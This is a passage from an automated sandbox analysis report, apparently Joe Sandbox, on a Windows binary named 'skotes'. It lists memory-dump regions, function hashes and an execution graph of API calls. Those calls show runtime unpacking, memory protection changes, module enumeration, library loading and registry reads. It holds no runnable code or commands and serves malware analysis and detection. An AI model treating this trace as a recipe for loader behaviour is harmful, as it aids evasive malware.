                                                    • Associated: 0000000C.00000002.2672964510.00000000003F9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673318430.00000000003FA000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673430177.0000000000598000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673461063.000000000059A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_e0000_skotes.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                    • Instruction ID: 992188f036bd508b4e6ffe52da009e70261a9d058b831f65cfc063d123ac8d00
                                                    • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                    • Instruction Fuzzy Hash: EDE08C72926228EBCB18DBD8C944ACAF7ECFB49B00BA500A6F511D3150C370EE40C7D0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2672836765.00000000000E1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000E0000, based on PE: true
                                                    • Associated: 0000000C.00000002.2672798695.00000000000E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672836765.0000000000142000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672928970.0000000000149000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.000000000014B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000002D8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003B8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003F9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673318430.00000000003FA000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673430177.0000000000598000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673461063.000000000059A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_e0000_skotes.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                    • String ID:
                                                    • API String ID: 57040152-0
                                                    • Opcode ID: 7e99524082562495d41eb86c10d96b4f71f4ddb8f9ef32f4c094ec914e0c4bca
                                                    • Instruction ID: a1e9985e72d2bb9fce589e438b2fe0a44ca71515c6b72cc456b72e944aa3d161
                                                    • Opcode Fuzzy Hash: 7e99524082562495d41eb86c10d96b4f71f4ddb8f9ef32f4c094ec914e0c4bca
                                                    • Instruction Fuzzy Hash: A3A11470A012499FEB60DF66C949BAABBF8FF14310F008179E915E7642EB31DA04DBD1
                                                    APIs
                                                    • _ValidateLocalCookies.LIBCMT ref: 00114877
                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0011487F
                                                    • _ValidateLocalCookies.LIBCMT ref: 00114908
                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00114933
                                                    • _ValidateLocalCookies.LIBCMT ref: 00114988
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2672836765.00000000000E1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000E0000, based on PE: true
                                                    • Associated: 0000000C.00000002.2672798695.00000000000E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672836765.0000000000142000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672928970.0000000000149000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.000000000014B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000002D8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003B8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003F9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673318430.00000000003FA000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673430177.0000000000598000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673461063.000000000059A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_e0000_skotes.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                    • String ID: csm
                                                    • API String ID: 1170836740-1018135373
                                                    • Opcode ID: 32bd3d3c978734f46b040e0688cb8007b65b22a1c576182a54580094c3705bb6
                                                    • Instruction ID: 05a81e47372f2585ab9e4ff4730ed14369400f008b450e0fb0b01d3cbc903d10
                                                    • Opcode Fuzzy Hash: 32bd3d3c978734f46b040e0688cb8007b65b22a1c576182a54580094c3705bb6
                                                    • Instruction Fuzzy Hash: 0051E834A0024D9BCF18DF68D881AEF7BB5AF49728F148075E8189B352D732D996CB91
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2672836765.00000000000E1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000E0000, based on PE: true
                                                    • Associated: 0000000C.00000002.2672798695.00000000000E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672836765.0000000000142000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672928970.0000000000149000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.000000000014B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000002D8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003B8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003F9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673318430.00000000003FA000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673430177.0000000000598000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673461063.000000000059A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_e0000_skotes.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _strrchr
                                                    • String ID:
                                                    • API String ID: 3213747228-0
                                                    • Opcode ID: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                    • Instruction ID: dda23e8e27961474653cdc72382807c703e131703706476e313bff1fd698bdb7
                                                    • Opcode Fuzzy Hash: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                    • Instruction Fuzzy Hash: C6B121329452969FDB19CF68C8817EEBFA5EF55340F14817AE844EB242D7349D81CBE0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2672836765.00000000000E1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000E0000, based on PE: true
                                                    • Associated: 0000000C.00000002.2672798695.00000000000E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672836765.0000000000142000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672928970.0000000000149000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.000000000014B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000002D8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003B8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003F9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673318430.00000000003FA000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673430177.0000000000598000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673461063.000000000059A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_e0000_skotes.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Xtime_diff_to_millis2_xtime_get
                                                    • String ID:
                                                    • API String ID: 531285432-0
                                                    • Opcode ID: 3434470013328b9d6af65360683c7cb8b8e1dafb3109c9396ec53ad471e46755
                                                    • Instruction ID: 591cf770816b0a9fcdb38c38b0c3955338a6d28226bad01da25ead1afb65d4e7
                                                    • Opcode Fuzzy Hash: 3434470013328b9d6af65360683c7cb8b8e1dafb3109c9396ec53ad471e46755
                                                    • Instruction Fuzzy Hash: EB210C75A0011DAFDF00EBA4DD82DFEB7B9EF48714F500425FA01A7662DB309D45ABA0

                                                    Execution Graph

                                                    Execution Coverage:0.8%
                                                    Dynamic/Decrypted Code Coverage:6.7%
                                                    Signature Coverage:2.5%
                                                    Total number of Nodes:446
                                                    Total number of Limit Nodes:5
                                                    execution_graph 29741 40a0b1 29742 40a0bd __FrameHandler3::FrameUnwindToState 29741->29742 29769 409e11 29742->29769 29744 40a217 29796 40a58a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter __CreateFrameInfo 29744->29796 29746 40a0c4 29746->29744 29756 40a0ee ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 29746->29756 29747 40a21e 29797 4106ab 21 API calls __CreateFrameInfo 29747->29797 29749 40a224 29798 41066f 21 API calls __CreateFrameInfo 29749->29798 29751 40a22c 29752 40a10d 29753 40a18e 29777 40a6a5 29753->29777 29756->29752 29756->29753 29795 410685 39 API calls 2 library calls 29756->29795 29770 409e1a 29769->29770 29799 40a2ec IsProcessorFeaturePresent 29770->29799 29772 409e26 29800 40b77d 10 API calls 2 library calls 29772->29800 29774 409e2f 29774->29746 29775 409e2b 29775->29774 29801 40b79c 7 API calls 2 library calls 29775->29801 29802 40b570 29777->29802 29779 40a6b8 GetStartupInfoW 29780 40a194 29779->29780 29781 412288 29780->29781 29803 41816d 29781->29803 29783 40a19c 29786 4087e0 29783->29786 29784 412291 29784->29783 29809 41841d 39 API calls 29784->29809 29812 402460 29786->29812 29789 402460 43 API calls 29790 408807 29789->29790 29816 405a50 29790->29816 29795->29753 29796->29747 29797->29749 29798->29751 29799->29772 29800->29775 29801->29774 29802->29779 29804 4181a8 29803->29804 29805 418176 29803->29805 29804->29784 29810 41299d 39 API calls 3 library calls 29805->29810 29807 418199 29811 417f78 49 API calls 3 library calls 29807->29811 29809->29784 29810->29807 29811->29804 29813 402483 29812->29813 29813->29813 30132 402760 29813->30132 29815 402495 29815->29789 30153 410822 GetSystemTimeAsFileTime 29816->30153 29818 405a9f 30155 4106e2 29818->30155 29821 402760 43 API calls 29822 405ada 29821->29822 29823 402760 43 API calls 29822->29823 29824 405ca0 29823->29824 30158 403ab0 43 API calls 2 library calls 29824->30158 29826 405e9f 30159 406c40 53 API calls 2 library calls 29826->30159 29828 40620c 29829 402460 43 API calls 29828->29829 29830 40621c 29829->29830 30160 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29830->30160 29832 406230 30161 406ee0 53 API calls 2 library calls 29832->30161 29834 40630a 29835 402460 43 API calls 29834->29835 29836 40631a 29835->29836 30162 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29836->30162 29838 40632e 29839 406404 29838->29839 29840 406336 29838->29840 30175 407290 53 API calls 2 library calls 29839->30175 30163 406f60 53 API calls 2 library calls 29840->30163 29843 40633b 29845 402460 43 API calls 29843->29845 29844 406409 29846 402460 43 API calls 29844->29846 29847 40634b 29845->29847 29848 406419 29846->29848 30164 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29847->30164 30176 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29848->30176 29850 406354 30165 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29850->30165 29853 40635c 30166 406ff0 53 API calls 2 library calls 29853->30166 29854 40642d 29856 4064ee 29854->29856 30177 407310 53 API calls 2 library calls 29854->30177 30189 407630 53 API calls 2 library calls 29856->30189 29859 406361 29862 402460 43 API calls 29859->29862 29860 40643a 29864 402460 43 API calls 29860->29864 29861 4064f8 29865 402460 43 API calls 29861->29865 29863 406371 29862->29863 30167 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29863->30167 29867 40644a 29864->29867 29868 406508 29865->29868 30178 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29867->30178 30190 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29868->30190 29869 40637a 30168 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29869->30168 29872 406453 30179 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29872->30179 29873 406382 30169 407070 53 API calls 2 library calls 29873->30169 29877 40645b 30180 407390 53 API calls 2 library calls 29877->30180 29878 40651c 30089 406603 29878->30089 30191 4076b0 53 API calls 2 library calls 29878->30191 29879 406387 29886 402460 43 API calls 29879->29886 29882 406460 29888 402460 43 API calls 29882->29888 29884 40660d 29890 402460 43 API calls 29884->29890 29885 406529 29889 402460 43 API calls 29885->29889 29887 406397 29886->29887 30170 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29887->30170 29891 406470 29888->29891 29893 406539 29889->29893 29894 40661d 29890->29894 30181 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29891->30181 30192 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29893->30192 30207 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29894->30207 29895 406479 30182 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29895->30182 29899 406542 30193 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29899->30193 29900 4063ab 29904 4063cc 29900->29904 29905 4063af 29900->29905 29902 406481 30183 407410 53 API calls 2 library calls 29902->30183 30172 407180 53 API calls 2 library calls 29904->30172 30171 407100 53 API calls 2 library calls 29905->30171 29907 406631 29912 4066b3 29907->29912 29913 406635 29907->29913 29909 40654a 30194 407730 53 API calls 2 library calls 29909->30194 29911 4063b4 29922 402460 43 API calls 29911->29922 30217 407c70 53 API calls 2 library calls 29912->30217 30208 407ae0 53 API calls 2 library calls 29913->30208 29914 406486 29923 402460 43 API calls 29914->29923 29916 4063d1 29924 402460 43 API calls 29916->29924 29919 40654f 29926 402460 43 API calls 29919->29926 29920 4066b8 29928 402460 43 API calls 29920->29928 29921 40663a 29929 402460 43 API calls 29921->29929 30102 4063c4 29922->30102 29925 406496 29923->29925 29927 4063e1 29924->29927 30184 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29925->30184 29930 40655f 29926->29930 30173 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29927->30173 29932 4066c8 29928->29932 29933 40664a 29929->29933 30195 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29930->30195 30218 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29932->30218 30209 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29933->30209 29935 406875 30247 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29935->30247 29938 406568 30196 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29938->30196 29940 4063f5 30036 4066a7 29940->30036 30174 407210 53 API calls 2 library calls 29940->30174 29942 406653 30210 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29942->30210 29943 4064aa 29947 4064b8 29943->29947 29948 4064ae 29943->29948 30186 407520 53 API calls 2 library calls 29947->30186 30185 4074a0 53 API calls 2 library calls 29948->30185 29949 406570 30197 4077b0 53 API calls 2 library calls 29949->30197 29953 4066dc 29959 4066e0 29953->29959 29960 40675e 29953->29960 29954 40665b 30211 407b60 53 API calls 2 library calls 29954->30211 29956 406575 29969 402460 43 API calls 29956->29969 29957 4064bd 29970 402460 43 API calls 29957->29970 30219 407d00 53 API calls 2 library calls 29959->30219 30228 407e80 53 API calls 2 library calls 29960->30228 29962 4068a1 30249 4083f0 53 API calls 2 library calls 29962->30249 29965 406660 29972 402460 43 API calls 29965->29972 29967 406763 29975 402460 43 API calls 29967->29975 29968 4066e5 29976 402460 43 API calls 29968->29976 29973 406585 29969->29973 29974 4064cd 29970->29974 29971 4068aa 29983 402460 43 API calls 29971->29983 29977 406670 29972->29977 30198 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29973->30198 30187 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29974->30187 29979 406773 29975->29979 29980 4066f5 29976->29980 30212 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29977->30212 30229 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29979->30229 30220 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29980->30220 29982 40658e 30199 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29982->30199 29984 4068bd 29983->29984 30250 408370 53 API calls 2 library calls 29984->30250 29986 406679 30213 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29986->30213 29990 4066fe 30221 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29990->30221 29992 406596 30200 407830 53 API calls 2 library calls 29992->30200 29993 4064e1 29993->30036 30188 4075b0 53 API calls 2 library calls 29993->30188 29994 4068c8 30008 402460 43 API calls 29994->30008 29997 406681 30214 407bf0 53 API calls 2 library calls 29997->30214 29999 406787 30004 40678b 29999->30004 30005 4067de 29999->30005 30000 406706 30222 407d80 53 API calls 2 library calls 30000->30222 30002 40659b 30014 402460 43 API calls 30002->30014 30230 407f10 53 API calls 2 library calls 30004->30230 30237 4080d0 53 API calls 2 library calls 30005->30237 30007 406686 30017 402460 43 API calls 30007->30017 30012 4068db 30008->30012 30010 40670b 30020 402460 43 API calls 30010->30020 30251 4082d0 53 API calls 2 library calls 30012->30251 30013 406790 30023 402460 43 API calls 30013->30023 30018 4065ab 30014->30018 30015 4067e3 30022 402460 43 API calls 30015->30022 30021 406696 30017->30021 30201 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 30018->30201 30019 4068e6 30032 402460 43 API calls 30019->30032 30024 40671b 30020->30024 30215 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 30021->30215 30031 4067f3 30022->30031 30027 4067a0 30023->30027 30223 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 30024->30223 30231 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 30027->30231 30029 40669f 30216 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 30029->30216 30030 4065bf 30037 4065c8 30030->30037 30202 4078c0 53 API calls 2 library calls 30030->30202 30238 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 30031->30238 30038 4068f9 30032->30038 30034 406724 30224 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 30034->30224 30248 4017a0 41 API calls __CreateFrameInfo 30036->30248 30203 407940 53 API calls 2 library calls 30037->30203 30252 408da0 43 API calls 30038->30252 30039 4067a9 30232 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 30039->30232 30041 40672c 30225 407e00 53 API calls 2 library calls 30041->30225 30047 4067b1 30233 407fd0 53 API calls 2 library calls 30047->30233 30049 406807 30049->30036 30239 408150 53 API calls 2 library calls 30049->30239 30050 4065d2 30060 402460 43 API calls 30050->30060 30051 40690e 30253 408e00 43 API calls __InternalCxxFrameHandler 30051->30253 30053 406731 30062 402460 43 API calls 30053->30062 30055 406926 30254 408eb0 43 API calls 30055->30254 30056 4067b6 30065 402460 43 API calls 30056->30065 30059 406810 30070 402460 43 API calls 30059->30070 30063 4065e2 30060->30063 30061 40693b 30255 408e00 43 API calls __InternalCxxFrameHandler 30061->30255 30066 406741 30062->30066 30204 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 30063->30204 30068 4067c6 30065->30068 30226 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 30066->30226 30067 406953 30256 408eb0 43 API calls 30067->30256 30234 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 30068->30234 30075 406820 30070->30075 30074 40674a 30227 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 30074->30227 30240 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 30075->30240 30076 4065f6 30076->30036 30205 4079d0 53 API calls 2 library calls 30076->30205 30077 406968 30257 408e00 43 API calls __InternalCxxFrameHandler 30077->30257 30078 4067cf 30235 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 30078->30235 30081 406829 30241 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 30081->30241 30086 406980 30258 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 30086->30258 30087 4067d7 30236 408050 53 API calls 2 library calls 30087->30236 30088 406831 30242 4081d0 53 API calls 2 library calls 30088->30242 30206 407a50 53 API calls 2 library calls 30089->30206 30093 40698e 30259 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 30093->30259 30094 406836 30100 402460 43 API calls 30094->30100 30096 406999 30260 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 30096->30260 30097 4067dc 30099 402460 43 API calls 30097->30099 30099->30102 30103 406846 30100->30103 30101 4069a4 30261 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 30101->30261 30246 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 30102->30246 30243 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 30103->30243 30105 4069af 30262 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 30105->30262 30108 40684f 30244 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 30108->30244 30109 4069ba 30263 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 30109->30263 30112 406857 30245 408250 53 API calls 2 library calls 30112->30245 30113 4069c5 30264 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 30113->30264 30116 4069d0 30265 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 30116->30265 30118 4069df 30119 406a3e Sleep 30118->30119 30121 406a00 30118->30121 30119->30118 30120 402460 43 API calls 30120->30121 30121->30119 30121->30120 30122 406a47 30121->30122 30266 402390 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 30122->30266 30124 406a4f 30267 408c80 43 API calls 2 library calls 30124->30267 30126 406a60 30268 408c80 43 API calls 2 library calls 30126->30268 30128 406a79 30269 408c80 43 API calls 2 library calls 30128->30269 30130 406a8c 30270 404f70 130 API calls 6 library calls 30130->30270 30133 402830 30132->30133 30134 40277f 30132->30134 30150 401600 43 API calls 3 library calls 30133->30150 30135 40278b __InternalCxxFrameHandler 30134->30135 30137 4027b3 30134->30137 30139 4027f7 30134->30139 30140 4027ee 30134->30140 30135->29815 30148 401560 41 API calls 4 library calls 30137->30148 30138 402835 30151 401560 41 API calls 3 library calls 30138->30151 30147 4027cf __InternalCxxFrameHandler 30139->30147 30149 401560 41 API calls 4 library calls 30139->30149 30140->30137 30140->30138 30142 4027c6 30142->30147 30152 40cfef 39 API calls ___std_exception_copy 30142->30152 30147->29815 30148->30142 30149->30147 30150->30138 30151->30142 30154 41085b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 30153->30154 30154->29818 30271 4128e2 GetLastError 30155->30271 30158->29826 30159->29828 30160->29832 30161->29834 30162->29838 30163->29843 30164->29850 30165->29853 30166->29859 30167->29869 30168->29873 30169->29879 30170->29900 30171->29911 30172->29916 30173->29940 30174->29911 30175->29844 30176->29854 30177->29860 30178->29872 30179->29877 30180->29882 30181->29895 30182->29902 30183->29914 30184->29943 30185->29911 30186->29957 30187->29993 30188->29856 30189->29861 30190->29878 30191->29885 30192->29899 30193->29909 30194->29919 30195->29938 30196->29949 30197->29956 30198->29982 30199->29992 30200->30002 30201->30030 30202->30037 30203->30050 30204->30076 30205->30089 30206->29884 30207->29907 30208->29921 30209->29942 30210->29954 30211->29965 30212->29986 30213->29997 30214->30007 30215->30029 30216->30036 30217->29920 30218->29953 30219->29968 30220->29990 30221->30000 30222->30010 30223->30034 30224->30041 30225->30053 30226->30074 30227->30036 30228->29967 30229->29999 30230->30013 30231->30039 30232->30047 30233->30056 30234->30078 30235->30087 30236->30097 30237->30015 30238->30049 30239->30059 30240->30081 30241->30088 30242->30094 30243->30108 30244->30112 30245->30097 30246->29935 30247->30036 30248->29962 30249->29971 30250->29994 30251->30019 30252->30051 30253->30055 30254->30061 30255->30067 30256->30077 30257->30086 30258->30093 30259->30096 30260->30101 30261->30105 30262->30109 30263->30113 30264->30116 30265->30118 30266->30124 30267->30126 30268->30128 30269->30130 30272 4128fe 30271->30272 30273 4128f8 30271->30273 30277 412902 30272->30277 30301 4135e5 6 API calls _unexpected 30272->30301 30300 4135a6 6 API calls _unexpected 30273->30300 30276 41291a 30276->30277 30278 412922 30276->30278 30279 412987 SetLastError 30277->30279 30302 413294 14 API calls 2 library calls 30278->30302 30282 405aa8 Sleep 30279->30282 30283 412997 30279->30283 30281 41292f 30284 412937 30281->30284 30285 412948 30281->30285 30282->29821 30309 411109 39 API calls __CreateFrameInfo 30283->30309 30303 4135e5 6 API calls _unexpected 30284->30303 30304 4135e5 6 API calls _unexpected 30285->30304 30290 412954 30291 412958 30290->30291 30292 41296f 30290->30292 30305 4135e5 6 API calls _unexpected 30291->30305 30307 412710 14 API calls _unexpected 30292->30307 30296 412945 30306 4132f1 14 API calls __dosmaperr 30296->30306 30297 41296c 30297->30279 30298 41297a 30308 4132f1 14 API calls __dosmaperr 30298->30308 30300->30272 30301->30276 30302->30281 30303->30296 30304->30290 30305->30296 30306->30297 30307->30298 30308->30297 30310 47a7cb9 30313 47a7cc4 30310->30313 30314 47a7cd3 30313->30314 30317 47a8464 30314->30317 30318 47a847f 30317->30318 30319 47a8488 CreateToolhelp32Snapshot 30318->30319 30320 47a84a4 Module32First 30318->30320 30319->30318 30319->30320 30321 47a7cc3 30320->30321 30322 47a84b3 30320->30322 30324 47a8123 30322->30324 30325 47a814e 30324->30325 30326 47a8197 30325->30326 30327 47a815f VirtualAlloc 30325->30327 30326->30326 30327->30326 30328 7043f4 30329 7043ad VirtualProtect 30328->30329 30332 7043fa 30328->30332 30331 7043e0 30329->30331 30333 5fac78 30334 5facd5 30333->30334 30335 5fad0b RegOpenKeyA 30334->30335 30336 5face4 RegOpenKeyA 30334->30336 30338 5fad28 30335->30338 30336->30335 30337 5fad01 30336->30337 30337->30335 30339 5fad6c GetNativeSystemInfo 30338->30339 30340 5fad77 30338->30340 30339->30340 30341 5fa8e7 30342 5fa8eb LoadLibraryA 30341->30342 30343 5fafc9 30342->30343 30344 495003c 30345 4950049 30344->30345 30346 495004c 30344->30346 30360 4950e0f SetErrorMode SetErrorMode 30346->30360 30351 4950265 30352 49502ce VirtualProtect 30351->30352 30354 495030b 30352->30354 30353 4950439 VirtualFree 30358 49505f4 LoadLibraryA 30353->30358 30359 49504be 30353->30359 30354->30353 30355 49504e3 LoadLibraryA 30355->30359 30357 49508c7 30358->30357 30359->30355 